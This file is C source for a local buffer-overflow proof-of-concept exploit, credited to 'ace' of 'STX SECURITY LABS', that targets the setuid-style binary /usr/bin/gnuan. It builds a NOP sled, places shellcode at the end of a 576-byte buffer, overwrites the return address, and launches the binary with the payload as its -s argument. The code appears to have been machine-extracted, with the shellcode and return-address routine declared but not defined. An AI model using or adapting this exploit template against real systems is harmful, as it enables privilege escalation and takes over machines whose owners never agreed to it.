
typedef unsigned long size_t;
typedef long intptr_t; typedef unsigned long uintptr_t;
typedef long scalar_t__;

typedef int bool;
 int execl (char*,char*,char*,char*,int *) ;
 scalar_t__ malloc (int) ;
 int memcpy (char*,int ,int) ;
 void* pen0r () ;
 int printf (char*,...) ;
 int strlen (int ) ;
 int stxcode ;
 int system (char*) ;

int main(int argc, char **argv) {

 int pos; int ace = pen0r(); int stxnop = 0x90;
 int stxbytes = 576; int stxtotal = stxbytes + 4;
 char *stxbof;
 stxbof = (char *)malloc(stxbytes);

 for(pos = 0; pos < stxbytes; pos++) {*(long *)&stxbof[pos] = stxnop;}
 *(long *)&stxbof[stxbytes] = pen0r();
 memcpy(stxbof + stxbytes - strlen(stxcode), stxcode, strlen(stxcode));

 system("clear");
 printf("#####################################\n");
 printf("#        [ STX SECURITY LABS ]      #\n");
 printf("#  gnuan local poc exploit by: ace  #\n");
 printf("#####################################\n\n");
 printf("[+] Return Address: 0x%x\n", ace);
 printf("[+] Buffer Size: %d\n", stxtotal);
 printf("[-] /usr/bin/gnuan -s pwned!\n\n");

 execl("/usr/bin/gnuan", "gnuan", "-s", stxbof, ((void*)0));

return 0;

}
